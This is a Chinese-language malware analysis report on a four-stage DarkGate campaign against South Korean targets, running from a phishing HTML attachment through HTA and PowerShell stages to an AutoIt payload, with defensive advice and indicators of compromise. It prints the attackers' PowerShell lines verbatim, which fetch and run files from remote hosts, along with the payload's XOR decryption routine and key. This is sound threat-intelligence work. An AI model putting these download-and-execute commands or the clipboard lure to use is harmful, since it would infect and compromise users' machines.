针对韩国实体的载荷投递,多阶段链路执行,通过二进制“.a3x”文件释放和执行Darkgate恶意软件
字数 2178 2025-08-22 12:23:13
Darkgate恶意软件多阶段攻击链分析
一、攻击概述
本次分析的是一个针对韩国实体的多阶段攻击链,通过精心设计的.html文件作为初始载荷,经过多个阶段最终释放并执行Darkgate恶意软件。攻击链设计精巧,使用了多种不常见的技术手段。
二、攻击流程总览
- 第一阶段:恶意HTML附件下载者
- 第二阶段:HTA文件下载者
- 第三阶段:PowerShell脚本下载者
- 第四阶段:AutoIt3脚本释放执行Darkgate远控
三、详细技术分析
3.1 第一阶段:恶意HTML附件
初始载体:
- 钓鱼邮件携带
.html附件 - 邮件包含诱饵描述信息诱导用户打开
执行过程:
- 运行后显示伪装成MS Word的界面
- 提示用户点击"How to fix"按钮查看"文档"
- 点击按钮触发download事件,将恶意PowerShell命令复制到剪贴板
PowerShell代码分析:
ipconfig /flushdns
$CN = 'c:\\users\\public\\wa.hta';
invoke-webrequest -uri hxxps://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta -outfile $CN;
start-process $CN;
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
[System.Windows.Forms.MessageBox]::Show("The operation completed successfully, please reload the page", "System", 0, 64);
clear-host;
功能解析:
- 刷新DNS缓存
- 从C2下载HTA文件到
c:\users\public\wa.hta - 执行下载的HTA文件
- 弹出成功提示框迷惑用户
- 清空剪贴板内容
3.2 第二阶段:HTA文件下载者
HTA文件特性:
- HTA(HTML Application)允许使用HTML、JavaScript和VBScript创建本地Windows应用
- 攻击者利用其执行恶意VBScript脚本
恶意行为:
- 隐藏任务栏执行
- 构造并执行PowerShell命令
- 从
dogmupdate.com/rdyjyany下载下一阶段载荷
3.3 第三阶段:PowerShell脚本下载者
PowerShell脚本内容:
ni 'C:/zkdz/' -Type Directory -Force;
cd 'C:/zkdz/';
Invoke-WebRequest -Uri "http://dogmupdate.com/yoomzhda" -OutFile 'file.zip';
Expand-Archive -Path 'file.zip' -DestinationPath 'C:/zkdz/';
start 'AutoIt3.exe' -a 'script.a3x';
attrib +h 'C:/zkdz/'
功能解析:
- 创建并进入
C:/zkdz/目录 - 下载
file.zip文件 - 解压获取
script.a3x文件 - 使用AutoIt3.exe执行script.a3x
- 隐藏
C:/zkdz/目录
3.4 第四阶段:AutoIt3脚本分析
文件特性:
.a3x是编译后的AutoIt脚本- 使用AutoIt Extractor工具提取资源
解密逻辑:
- 使用异或和按位取反操作解密载荷
- 解密密钥为"SFZFQODn"
- 密文存储在$data变量和单独放置的hex流中
解密函数示例:
Func _ENCRYPT($vvalue, $skey)
$tbyte = DllStructCreate("BYTE")
Local $s_encrypted
Local $ikeyalt = BinaryLen($skey)
For $i = 0x1 To $ikeyalt
$ikeyalt = BitXOR(BinaryMid($skey, $i, 0x1), $ikeyalt)
Next
For $i = 0x1 To BinaryLen($vvalue)
$s_encrypted &= Chr(DllStructSetData($tbyte, 0x1, BitNOT(BitXOR(BinaryMid($vvalue, $i, 0x1), $ikeyalt))))
Next
Return $s_encrypted
EndFunc
最终载荷:
- 解密后为Darkgate恶意软件
- 创建结构体并调用Windows API函数:
- VirtualProtect
- EnumWindows
四、防御建议
-
邮件安全:
- 警惕不明来源的HTML附件
- 对员工进行钓鱼邮件识别培训
-
执行控制:
- 限制PowerShell执行权限
- 监控异常HTA文件执行
- 限制AutoIt3.exe的使用
-
网络防护:
- 拦截已知恶意域名
- 监控异常DNS请求和Web流量
-
终端防护:
- 启用行为检测机制
- 监控可疑的文件创建和进程执行链
五、IOC指标
文件哈希
第一阶段:
- 8b788345fe1a3e9070e2d2982c1f1eb2 (html)
- 4b653886093a209c3d86cb43d507a53f (html)
- 318f00b609039588ce5ace3bf1f8d05f (html)
第二阶段:
- 30e2442555a4224bf15bbffae5e184ee (dark.hta)
- a77becccca5571c00ebc9e516fd96ce8 (1.hta)
第三阶段:
- 7484931957633b796f165061b0c59794 (rdyjyany)
- f2e4351aa516a1f2e59ade5d9e7aa1d6 (umkglnks)
第四阶段:
- 404bd47f17d482e139e64d0106b8888d (script.a3x)
- e0173741b91cabfecd703c20241c1108 (script.a3x)
- 4d52ea9aa7cd3a0e820a9421d936073f (script.a3x)
恶意域名
- hxxps://jenniferwelsh[.]com/header.png
- hxxp://mylittlecabbage[.]net/qhsddxna
- hxxp://mylittlecabbage[.]net/xcdttafq
- hxxps://linktoxic34[.]com/wp-content/themes/twentytwentytwo/dark.hta
- hxxp://dogmupdate[.]com/rdyjyany
- hxxp://dogmupdate[.]com/yoomzhda
- hxxps://www.rockcreekdds[.]com/wp-content/1.hta
- hxxp://flexiblemaria[.]com/umkglnks
- hxxp://flexiblemaria[.]com/iinkqrwu
六、总结
此攻击链展示了现代恶意软件攻击的复杂性和多阶段性,从初始的HTML社会工程攻击,到利用多种脚本语言(PowerShell、VBScript、AutoIt)进行多阶段载荷传递,最终释放成熟的Darkgate远控软件。攻击者精心设计了每个阶段的迷惑性和隐蔽性,值得安全团队高度警惕。